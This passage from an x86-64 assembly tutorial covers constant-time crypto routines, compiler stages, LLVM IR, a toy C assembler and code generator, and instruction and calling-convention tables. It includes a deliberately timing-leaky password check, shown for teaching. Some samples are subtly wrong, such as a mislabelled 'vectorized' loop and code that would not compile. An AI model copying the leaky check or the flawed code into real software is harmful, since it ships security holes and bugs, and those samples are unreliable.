xor eax, r13d
ret
; Sigma1 function (for 32-bit values)
Sigma1:
mov r13d, eax
ror eax, 6
ror r13d, 11
xor eax, r13d
ror r13d, 25
xor eax, r13d
ret
; sigma0 function (for message schedule)
sigma0:
mov r13d, eax
ror eax, 7
ror r13d, 18
xor eax, r13d
shr eax, 3
xor eax, r13d
ret
; sigma1 function (for message schedule)
sigma1:
mov r13d, eax
ror eax, 17
ror r13d, 19
xor eax, r13d
shr eax, 10
xor eax, r13d
retCryptographic code must avoid timing side-channels.
Vulnerable Code
// Timing leaks! Different paths take different time
int check_password(const char *user, const char *expected) {
for (int i = 0; i < len; i++) {
if (user[i] != expected[i]) {
return 0; // Early exit leaks information
}
}
return 1;
}Constant-Time Comparison
; constant_time_cmp.asm - Compare without early exit
; RDI = buffer1, RSI = buffer2, RDX = length
; Returns 0 if equal, non-zero if different
global constant_time_cmp
constant_time_cmp:
push rbp
mov rbp, rsp
xor rax, rax ; result = 0
xor rcx, rcx ; counter
.loop:
; Load bytes
movzx r8, byte [rdi + rcx]
movzx r9, byte [rsi + rcx]
; XOR and OR into result
xor r8, r9
or rax, r8
inc rcx
cmp rcx, rdx
jl .loop
; Return (0 if all bytes equal)
pop rbp
retConstant-Time Select
; constant_time_select.asm - Choose between two values without branching
; RDI = condition (0 or 1), RSI = val_if_true, RDX = val_if_false
; Returns selected value
global constant_time_select
constant_time_select:
; Create mask: if condition, mask = 0xFFFFFFFFFFFFFFFF
neg rdi
sbb rdi, rdi
; (mask & val_if_true) | (~mask & val_if_false)
mov rax, rdi
and rax, rsi
not rdi
and rdi, rdx
or rax, rdi
retConstant-Time AES S-box
; constant_time_sbox.asm - S-box lookup without cache timing leaks
; Using bit-sliced implementation or vector permutations
; Example: bit-sliced AES S-box (simplified)
; This implementation avoids table lookups
bit_sliced_sbox:
; Convert byte to bits in separate registers
; Compute S-box using Boolean expressions
; This is constant-time but complex
; Simplified version using SSE shuffles
; (still may leak through cache)
; Better: use AES-NI instructions
aesenc xmm0, xmm1 ; hardware AES is constant-time
retSource Code (C/C++)
↓
Lexical Analysis (tokenization)
↓
Parsing (AST construction)
↓
Semantic Analysis
↓
Intermediate Representation (IR)
↓
Optimization
↓
Code Generation
↓
Assembly
↓
Object Code
// Original C
int add(int a, int b) {
return a + b;
}Compiler-Generated Assembly (unoptimized)
add:
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-4], edi
mov DWORD PTR [rbp-8], esi
mov edx, DWORD PTR [rbp-4]
mov eax, DWORD PTR [rbp-8]
add eax, edx
pop rbp
retOptimized (-O2)
add:
lea eax, [rdi+rsi]
ret// Original C
int max(int a, int b) {
if (a > b) return a;
return b;
}Generated Assembly
max:
cmp edi, esi
mov eax, esi
cmovg eax, edi ; conditional move
ret// Original C
int sum_array(int *arr, int n) {
int total = 0;
for (int i = 0; i < n; i++) {
total += arr[i];
}
return total;
}Vectorized Assembly
sum_array:
test esi, esi
jle .L3
xor eax, eax
xor ecx, ecx
.L2:
add eax, [rdi+rcx*4]
inc rcx
cmp ecx, esi
jl .L2
ret
.L3:
xor eax, eax
retWith AVX Vectorization
sum_array_avx:
test esi, esi
jle .L3
xor eax, eax
vpxor xmm0, xmm0, xmm0
xor ecx, ecx
.L2:
vmovdqu xmm1, [rdi+rcx*4]
vpaddd xmm0, xmm0, xmm1
add ecx, 4
cmp ecx, esi
jl .L2
; Horizontal sum
vextracti128 xmm1, ymm0, 1
vpaddd xmm0, xmm0, xmm1
vpsrldq xmm1, xmm0, 8
vpaddd xmm0, xmm0, xmm1
vpsrldq xmm1, xmm0, 4
vpaddd xmm0, xmm0, xmm1
vmovd eax, xmm0
ret
.L3:
xor eax, eax
rett1 = a + b
t2 = t1 * c
d = t2 - e
a1 = 5
b1 = a1 + 3
c1 = b1 * 2
if (c1 > 10)
a2 = c1 + 1
else
a3 = c1 - 1
a4 = φ(a2, a3)
; LLVM IR for simple function
define i32 @add(i32 %a, i32 %b) {
entry:
%sum = add i32 %a, %b
ret i32 %sum
}
; With control flow
define i32 @max(i32 %a, i32 %b) {
entry:
%cmp = icmp sgt i32 %a, %b
br i1 %cmp, label %then, label %else
then:
br label %merge
else:
br label %merge
merge:
%result = phi i32 [ %a, %then ], [ %b, %else ]
ret i32 %result
}// assembler.c - Simple two-pass assembler
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#define MAX_LINE 256
#define MAX_SYMBOLS 1024
#define MAX_CODE 65536
typedef struct {
char name[64];
uint32_t address;
int defined;
} symbol_t;
typedef struct {
char mnemonic[16];
uint8_t opcode;
int has_imm;
} instruction_t;
// Instruction table
instruction_t inst_table[] = {
{"nop", 0x90, 0},
{"mov", 0xB8, 1}, // mov reg, imm (simplified)
{"add", 0x01, 0},
{"sub", 0x29, 0},
{"jmp", 0xE9, 1},
{"ret", 0xC3, 0},
{"int", 0xCD, 1},
{NULL, 0, 0}
};
// Symbol table
symbol_t symbols[MAX_SYMBOLS];
int symbol_count = 0;
// Generated code
uint8_t code[MAX_CODE];
uint32_t code_ptr = 0;
// Add symbol
int add_symbol(char *name, uint32_t addr) {
for (int i = 0; i < symbol_count; i++) {
if (strcmp(symbols[i].name, name) == 0) {
symbols[i].address = addr;
symbols[i].defined = 1;
return i;
}
}
strcpy(symbols[symbol_count].name, name);
symbols[symbol_count].address = addr;
symbols[symbol_count].defined = 1;
return symbol_count++;
}
// Find symbol
int find_symbol(char *name) {
for (int i = 0; i < symbol_count; i++) {
if (strcmp(symbols[i].name, name) == 0) {
return i;
}
}
return -1;
}
// Parse instruction
int parse_instruction(char *line, uint32_t addr) {
char mnemonic[16];
char operand[64];
int n = sscanf(line, "%s %s", mnemonic, operand);
// Find instruction
instruction_t *inst = NULL;
for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
inst = &inst_table[i];
break;
}
}
if (!inst) return -1;
// First pass: just track labels
if (n == 1) {
code[code_ptr++] = inst->opcode;
if (inst->has_imm) {
// Placeholder for relocation
code[code_ptr++] = 0;
code[code_ptr++] = 0;
code[code_ptr++] = 0;
code[code_ptr++] = 0;
}
} else {
// Check if operand is a label
if (operand[0] == '_' || operand[0] == '.' ||
(operand[0] >= 'a' && operand[0] <= 'z')) {
// Label reference - add to symbol table if not defined
if (find_symbol(operand) == -1) {
add_symbol(operand, 0); // undefined for now
}
}
}
return 0;
}
// First pass - collect labels
void first_pass(FILE *in) {
char line[MAX_LINE];
uint32_t addr = 0;
while (fgets(line, sizeof(line), in)) {
// Remove newline
line[strcspn(line, "\n")] = 0;
// Skip empty lines
if (line[0] == '\0') continue;
// Check for label
if (line[strlen(line)-1] == ':') {
line[strlen(line)-1] = 0; // Remove colon
add_symbol(line, addr);
continue;
}
// Parse instruction (first pass - just for size)
parse_instruction(line, addr);
}
rewind(in);
}
// Second pass - generate code
void second_pass(FILE *in) {
char line[MAX_LINE];
code_ptr = 0;
while (fgets(line, sizeof(line), in)) {
line[strcspn(line, "\n")] = 0;
if (line[0] == '\0') continue;
// Skip labels
if (line[strlen(line)-1] == ':') continue;
char mnemonic[16];
char operand[64];
int n = sscanf(line, "%s %s", mnemonic, operand);
// Find instruction
instruction_t *inst = NULL;
for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
inst = &inst_table[i];
break;
}
}
if (!inst) continue;
// Emit opcode
code[code_ptr++] = inst->opcode;
// Emit operand
if (inst->has_imm) {
if (n > 1) {
// Check if numeric or label
char *endptr;
long val = strtol(operand, &endptr, 0);
if (*endptr == '\0') {
// Numeric constant
*(uint32_t*)(code + code_ptr) = (uint32_t)val;
} else {
// Label reference
int sym_idx = find_symbol(operand);
if (sym_idx >= 0) {
// Calculate relative address for jumps
if (inst->opcode == 0xE9) { // jmp
int32_t rel = symbols[sym_idx].address -
(code_ptr + 4);
*(int32_t*)(code + code_ptr) = rel;
} else {
*(uint32_t*)(code + code_ptr) =
symbols[sym_idx].address;
}
}
}
}
code_ptr += 4;
}
}
}
// Main assembler
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s input.asm\n", argv[0]);
return 1;
}
FILE *in = fopen(argv[1], "r");
if (!in) {
perror("fopen");
return 1;
}
// Two-pass assembly
first_pass(in);
second_pass(in);
fclose(in);
// Output binary
char outname[256];
snprintf(outname, sizeof(outname), "%s.bin", argv[1]);
FILE *out = fopen(outname, "wb");
fwrite(code, 1, code_ptr, out);
fclose(out);
printf("Assembled %u bytes to %s\n", code_ptr, outname);
return 0;
}// ast.h - Abstract Syntax Tree
typedef enum {
NODE_INT,
NODE_VAR,
NODE_ADD,
NODE_SUB,
NODE_MUL,
NODE_DIV,
NODE_ASSIGN,
NODE_IF,
NODE_WHILE,
NODE_RETURN,
NODE_BLOCK
} node_type_t;
typedef struct ast_node {
node_type_t type;
union {
int int_value;
char *var_name;
struct {
struct ast_node *left;
struct ast_node *right;
} binary;
struct {
struct ast_node *cond;
struct ast_node *then;
struct ast_node *els;
} if_stmt;
struct {
struct ast_node *cond;
struct ast_node *body;
} while_stmt;
struct {
struct ast_node *expr;
} return_stmt;
struct {
struct ast_node **stmts;
int count;
} block;
} data;
} ast_node_t;// codegen.c - x86-64 code generator
#include "ast.h"
#include <stdio.h>
#include <stdlib.h>
typedef struct {
FILE *out;
int label_counter;
} codegen_t;
// Generate new label
char* new_label(codegen_t *cg) {
static char buf[32];
snprintf(buf, sizeof(buf), ".L%d", cg->label_counter++);
return buf;
}
// Generate code for expression (result in EAX)
void gen_expr(codegen_t *cg, ast_node_t *node) {
switch (node->type) {
case NODE_INT:
fprintf(cg->out, " mov eax, %d\n", node->data.int_value);
break;
case NODE_VAR:
fprintf(cg->out, " mov eax, [rbp-%d]\n",
find_var(node->data.var_name) * 4);
break;
case NODE_ADD:
gen_expr(cg, node->data.binary.left);
fprintf(cg->out, " push rax\n");
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " pop rcx\n");
fprintf(cg->out, " add eax, ecx\n");
break;
case NODE_SUB:
gen_expr(cg, node->data.binary.left);
fprintf(cg->out, " push rax\n");
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " mov ecx, eax\n");
fprintf(cg->out, " pop rax\n");
fprintf(cg->out, " sub eax, ecx\n");
break;
case NODE_MUL:
gen_expr(cg, node->data.binary.left);
fprintf(cg->out, " push rax\n");
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " pop rcx\n");
fprintf(cg->out, " imul eax, ecx\n");
break;
default:
break;
}
}
// Generate code for statement
void gen_stmt(codegen_t *cg, ast_node_t *node) {
switch (node->type) {
case NODE_ASSIGN:
gen_expr(cg, node->data.binary.right);
fprintf(cg->out, " mov [rbp-%d], eax\n",
find_var(node->data.binary.left->data.var_name) * 4);
break;
case NODE_IF: {
char *label_else = new_label(cg);
char *label_end = new_label(cg);
// Generate condition
gen_expr(cg, node->data.if_stmt.cond);
fprintf(cg->out, " cmp eax, 0\n");
fprintf(cg->out, " je %s\n", label_else);
// Then part
gen_stmt(cg, node->data.if_stmt.then);
fprintf(cg->out, " jmp %s\n", label_end);
// Else part
fprintf(cg->out, "%s:\n", label_else);
if (node->data.if_stmt.els) {
gen_stmt(cg, node->data.if_stmt.els);
}
fprintf(cg->out, "%s:\n", label_end);
break;
}
case NODE_WHILE: {
char *label_start = new_label(cg);
char *label_end = new_label(cg);
fprintf(cg->out, "%s:\n", label_start);
// Generate condition
gen_expr(cg, node->data.while_stmt.cond);
fprintf(cg->out, " cmp eax, 0\n");
fprintf(cg->out, " je %s\n", label_end);
// Loop body
gen_stmt(cg, node->data.while_stmt.body);
fprintf(cg->out, " jmp %s\n", label_start);
fprintf(cg->out, "%s:\n", label_end);
break;
}
case NODE_RETURN:
gen_expr(cg, node->data.return_stmt.expr);
fprintf(cg->out, " jmp .return\n");
break;
case NODE_BLOCK:
for (int i = 0; i < node->data.block.count; i++) {
gen_stmt(cg, node->data.block.stmts[i]);
}
break;
default:
break;
}
}
// Generate function prologue
void gen_prologue(codegen_t *cg, int stack_size) {
fprintf(cg->out, " push rbp\n");
fprintf(cg->out, " mov rbp, rsp\n");
fprintf(cg->out, " sub rsp, %d\n", stack_size);
}
// Generate function epilogue
void gen_epilogue(codegen_t *cg) {
fprintf(cg->out, ".return:\n");
fprintf(cg->out, " mov rsp, rbp\n");
fprintf(cg->out, " pop rbp\n");
fprintf(cg->out, " ret\n");
}
// Generate complete function
void gen_function(codegen_t *cg, ast_node_t *func) {
// Calculate stack size for local variables
int stack_size = count_locals(func) * 4;
fprintf(cg->out, "global %s\n", func->data.var_name);
fprintf(cg->out, "%s:\n", func->data.var_name);
gen_prologue(cg, stack_size);
gen_stmt(cg, func->data.block);
gen_epilogue(cg);
fprintf(cg->out, "\n");
}
// Generate entire program
void generate_program(codegen_t *cg, ast_node_t *program) {
fprintf(cg->out, "; Generated by simple compiler\n");
fprintf(cg->out, "section .text\n\n");
for (int i = 0; i < program->data.block.count; i++) {
gen_function(cg, program->data.block.stmts[i]);
}
}
// Example usage
int main() {
codegen_t cg = {stdout, 0};
// Example AST for: int main() { return 42; }
ast_node_t *program = create_block(
create_function("main",
create_block(
create_return(
create_int(42)
)
)
)
);
generate_program(&cg, program);
return 0;
}| Instruction | Description | Example |
|---|---|---|
| MOV | Move | mov rax, rbx |
| MOVZX | Move with zero-extend | movzx eax, bl |
| MOVSX | Move with sign-extend | movsx rax, bx |
| MOVSXD | Move with sign-extend (32->64) | movsxd rax, ebx |
| XCHG | Exchange | xchg rax, rbx |
| PUSH | Push onto stack | push rax |
| POP | Pop from stack | pop rax |
| LEA | Load effective address | lea rax, [rbx+rcx*4] |
| Instruction | Description | Example |
|---|---|---|
| ADD | Add | add rax, rbx |
| ADC | Add with carry | adc rax, rbx |
| SUB | Subtract | sub rax, rbx |
| SBB | Subtract with borrow | sbb rax, rbx |
| MUL | Unsigned multiply | mul rbx |
| IMUL | Signed multiply | imul rax, rbx |
| DIV | Unsigned divide | div rbx |
| IDIV | Signed divide | idiv rbx |
| INC | Increment | inc rax |
| DEC | Decrement | dec rax |
| NEG | Negate | neg rax |
| CMP | Compare | cmp rax, rbx |
| Instruction | Description | Example |
|---|---|---|
| AND | Logical AND | and rax, rbx |
| OR | Logical OR | or rax, rbx |
| XOR | Exclusive OR | xor rax, rax |
| NOT | Complement | not rax |
| TEST | Test (AND without store) | test rax, rax |
| Instruction | Description | Example |
|---|---|---|
| SHL | Shift left | shl rax, cl |
| SHR | Shift right | shr rax, cl |
| SAL | Arithmetic shift left | sal rax, cl |
| SAR | Arithmetic shift right | sar rax, cl |
| ROL | Rotate left | rol rax, cl |
| ROR | Rotate right | ror rax, cl |
| RCL | Rotate through carry left | rcl rax, cl |
| RCR | Rotate through carry right | rcr rax, cl |
| Instruction | Description | Example |
|---|---|---|
| JMP | Unconditional jump | jmp label |
| JE/JZ | Jump if equal/zero | je label |
| JNE/JNZ | Jump if not equal | jne label |
| JG | Jump if greater (signed) | jg label |
| JL | Jump if less (signed) | jl label |
| JGE | Jump if greater/equal | jge label |
| JLE | Jump if less/equal | jle label |
| JA | Jump if above (unsigned) | ja label |
| JB | Jump if below (unsigned) | jb label |
| CALL | Call procedure | call func |
| RET | Return | ret |
| LOOP | Loop with RCX | loop label |
| Instruction | Description | Example |
|---|---|---|
| MOVS | Move string | movsb |
| CMPS | Compare string | cmpsb |
| SCAS | Scan string | scasb |
| STOS | Store string | stosb |
| LODS | Load string | lodsb |
| REP | Repeat prefix | rep movsb |
| Instruction | Description | Example |
|---|---|---|
| SYSCALL | Fast system call | syscall |
| SYSRET | Return from syscall | sysret |
| INT | Software interrupt | int 0x80 |
| IRET | Return from interrupt | iret |
| HLT | Halt processor | hlt |
| RDMSR | Read model-specific register | rdmsr |
| WRMSR | Write model-specific register | wrmsr |
| CPUID | Processor identification | cpuid |
| RDTSC | Read timestamp counter | rdtsc |
| Instruction | Description | Example |
|---|---|---|
| MOVAPS | Move aligned packed single | movaps xmm0, xmm1 |
| MOVUPS | Move unaligned packed single | movups xmm0, [mem] |
| ADDPS | Add packed single | addps xmm0, xmm1 |
| SUBPS | Subtract packed single | subps xmm0, xmm1 |
| MULPS | Multiply packed single | mulps xmm0, xmm1 |
| DIVPS | Divide packed single | divps xmm0, xmm1 |
| SQRTPS | Square root packed single | sqrtps xmm0, xmm1 |
| ANDPS | Bitwise AND of packed single | andps xmm0, xmm1 |
| ORPS | Bitwise OR | orps xmm0, xmm1 |
| XORPS | Bitwise XOR | xorps xmm0, xmm1 |
rax: Return value, scratch
rbx: Callee-saved
rcx: Scratch (argument 4)
rdx: Scratch (argument 3, return high)
rsi: Scratch (argument 2)
rdi: Scratch (argument 1)
rbp: Callee-saved (frame pointer)
rsp: Stack pointer
r8: Scratch (argument 5)
r9: Scratch (argument 6)
r10-r11: Scratch
r12-r15: Callee-saved
xmm0-1: Return value, arguments
xmm2-7: Arguments
xmm8-15: Scratch (caller-saved)
High addresses
+-----------------+
| Caller's frame |
+-----------------+ <-- 16-byte aligned
| Return address |
+-----------------+ <-- rbp+8
| Saved rbp |
+-----------------+ <-- rbp
| Local vars |
| (alignment) |
+-----------------+ <-- rsp
Low addresses
rax: Return value, scratch
rcx: Argument 1
rdx: Argument 2
r8: Argument 3
r9: Argument 4
r10-r11: Scratch
rbx: Callee-saved
rbp: Callee-saved
rdi: Callee-saved
rsi: Callee-saved
r12-r15: Callee-saved
xmm0-3: Arguments
xmm4-5: Scratch
xmm6-15: Callee-saved
Caller must allocate 32 bytes (4×8) on stack before call:
sub rsp, 32+8 ; shadow space + alignment
call func
add rsp, 32+8